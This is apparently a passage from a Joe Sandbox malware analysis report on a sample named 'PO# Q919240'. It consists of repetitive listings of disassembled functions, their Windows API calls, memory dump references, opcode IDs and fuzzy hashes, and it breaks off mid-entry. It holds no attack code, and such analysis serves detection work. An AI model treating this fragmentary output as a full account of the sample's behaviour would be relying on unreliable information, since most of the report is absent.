                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                Download Yara Rule
                APIs
                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                • SendMessageW.USER32 ref: 00471AE3
                • DestroyIcon.USER32(?), ref: 00471AF4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                • String ID:
                • API String ID: 3611059338-0
                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DestroyWindow$DeleteObject$IconMove
                • String ID:
                • API String ID: 1640429340-0
                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • _wcslen.LIBCMT ref: 004438CD
                • _wcslen.LIBCMT ref: 004438E6
                • _wcstok.LIBCMT ref: 004438F8
                • _wcslen.LIBCMT ref: 0044390C
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                • _wcstok.LIBCMT ref: 00443931
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                • String ID:
                • API String ID: 3632110297-0
                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteMenuObject$IconWindow
                • String ID:
                • API String ID: 752480666-0
                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                • String ID:
                • API String ID: 3275902921-0
                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                • String ID:
                • API String ID: 3275902921-0
                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32 ref: 004555C7
                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                • String ID:
                • API String ID: 3691411573-0
                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                • LineTo.GDI32(?,?,?), ref: 004472AC
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                • LineTo.GDI32(?,?,?), ref: 004472C6
                • EndPath.GDI32(?), ref: 004472D6
                • StrokePath.GDI32(?), ref: 004472E4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                • String ID:
                • API String ID: 372113273-0
                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 0044CC6D
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • __getptd.LIBCMT ref: 0041708E
                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                • __amsg_exit.LIBCMT ref: 004170AE
                • __lock.LIBCMT ref: 004170BE
                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                • _free.LIBCMT ref: 004170EE
                • InterlockedIncrement.KERNEL32(00942DB0), ref: 00417106
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                Download Yara Rule
                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                Download Yara Rule
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                • ExitThread.KERNEL32 ref: 004151ED
                • __freefls@4.LIBCMT ref: 00415209
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                • String ID:
                • API String ID: 442100245-0
                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
